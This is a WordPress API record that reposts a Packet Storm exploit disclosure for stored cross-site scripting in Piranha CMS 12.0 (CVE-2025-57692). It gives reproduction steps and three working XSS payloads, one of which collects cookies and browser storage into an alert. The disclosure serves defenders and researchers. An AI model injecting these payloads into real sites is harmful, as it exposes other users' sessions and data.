{"id":39286,"date":"2026-02-05T15:36:11","date_gmt":"2026-02-05T15:36:11","guid":{"rendered":"http:\/\/localhost\/?p=39286"},"modified":"2026-02-05T15:36:11","modified_gmt":"2026-02-05T15:36:11","slug":"piranha-cms-120-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39286","title":{"rendered":"\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting_PACKETSTORM:215044"},"content":{"rendered":"

{“lastseen”:”2026-02-05T20:43:24″,”description”:”Piranha CMS version 12.0 suffers from a cross site scripting vulnerability…”,”published”:”2026-02-05T00:00:00″,”modified”:”2026-02-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:215044″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-57692″],”sourceData”:”# Exploit Title: Piranha CMS 12.0 – Stored Cross Site Scripting \\n # Date: 2025-09-26\\n # Exploit Author: Chidubem Chukwu (Terminal Venom)\\n # LinkedIn : https:\/\/www.linkedin.com\/in\/chidubem-chukwu-20bb202a9?\\n # Vendor Homepage: https:\/\/piranhacms.org\\n # Software Link: https:\/\/github.com\/PiranhaCMS\/piranha.core\/releases\/tag\/v12.0\\n # Version: 12.0\\n # Category: Web Application\\n # Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome \\n # CVE: CVE-2025-57692\\n # Privilege Level: authenticated user\\n # Patched Version: Not available\\n # Exploit link: https:\/\/github.com\/Saconyfx\/security-advisories\/blob\/main\/CVE-2025-57692\/advisory.md\\n \\n \\n \\n \\n ## Reproduction Steps ##\\n \\n PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via \/manager\/pages, enabling execution of arbitrary JavaScript in another user s browser.\\n \\n Reproduction steps \\n \\n \\t1.\\tLog in to the Piranha admin panel at https:\/\/\\u003chost\\u003e\/manager\/login.\\n \\n \\t2.\\tNavigate to Pages.\\n \\n \\t3.\\tClick Add Page and choose Standard Page or Standard Archive.\\n \\n \\t4.\\tEnter a page title (e.g., XSS-Test).\\n \\n \\t5.\\tClick the [ + ] button and select Text under Content to add a Text block.\\n \\n \\t6.\\tIn the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted\/saved and will also execute for anyone who later accesses or previews the page.\\n \\n Payload A \\n \\n \\u003cimg src=\\”x\\” onerror=\\”\\n alert(\\n ‘Cookies: ‘ + document.cookie + ‘\\\\n’ +\\n ‘LocalStorage: ‘ + JSON.stringify(localStorage) + ‘\\\\n’ +\\n ‘SessionStorage: ‘ + JSON.stringify(sessionStorage) + ‘\\\\n’ +\\n ‘URL: ‘ + window.location.href + ‘\\\\n’ +\\n ‘User Agent: ‘ + navigator.userAgent + ‘\\\\n’ +\\n ‘Time: ‘ + new Date().toLocaleString()\\n )\\n \\” \/\\u003e\\n \\n Payload B \u2014 iframe base64 \\n \\n \\u003ciframe src=\\”data:text\/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\”\\u003e\\u003c\/iframe\\u003e\\n \\n Payload C \u2014 details toggle (on-toggle alert)\\n \\n \\u003cdetails open ontoggle=alert(‘XSS’)\\u003eClick\\u003c\/details\\u003e\\n \\n \\t7.\\tClick Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).\\n \\n \\t8.\\tAnyone who accesses the page (or pastes the payload) will trigger the XSS.”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215044″,”cvss”:{“score”:6.8,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:U\/C:H\/I:L\/A:L”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215044\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-05T20:43:24″,”description”:”Piranha CMS version 12.0 suffers from a cross site scripting vulnerability…”,”published”:”2026-02-05T00:00:00″,”modified”:”2026-02-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:215044″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-57692″],”sourceData”:”# Exploit Title: Piranha CMS 12.0 – Stored Cross…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,25,12,21,13,53,7,11,5],"class_list":["post-39286","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-68","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting_PACKETSTORM:215044 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39286\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting_PACKETSTORM:215044 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-05T20:43:24″,”description”:”Piranha CMS version 12.0 suffers from a cross site scripting vulnerability…”,”published”:”2026-02-05T00:00:00″,”modified”:”2026-02-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:215044″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-57692″],”sourceData”:”# Exploit Title: Piranha CMS 12.0 – Stored Cross...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39286\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-05T15:36:11+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39286#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39286\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting_PACKETSTORM:215044\",\"datePublished\":\"2026-02-05T15:36:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39286\"},\"wordCount\":508,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.8\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39286#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39286\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39286\",\"name\":\"\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting_PACKETSTORM:215044 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-05T15:36:11+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39286#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39286\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39286#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting_PACKETSTORM:215044\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting_PACKETSTORM:215044 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39286","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting_PACKETSTORM:215044 - zero redgem","og_description":"{“lastseen”:”2026-02-05T20:43:24″,”description”:”Piranha CMS version 12.0 suffers from a cross site scripting vulnerability…”,”published”:”2026-02-05T00:00:00″,”modified”:”2026-02-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:215044″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-57692″],”sourceData”:”# Exploit Title: Piranha CMS 12.0 – Stored Cross...","og_url":"https:\/\/zero.redgem.net\/?p=39286","og_site_name":"zero redgem","article_published_time":"2026-02-05T15:36:11+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39286#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39286"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting_PACKETSTORM:215044","datePublished":"2026-02-05T15:36:11+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39286"},"wordCount":508,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.8","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39286#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39286","url":"https:\/\/zero.redgem.net\/?p=39286","name":"\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting_PACKETSTORM:215044 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-05T15:36:11+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39286#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39286"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39286#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Piranha CMS 12.0 Cross Site Scripting_PACKETSTORM:215044"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39286","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39286"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39286\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39286"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39286"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}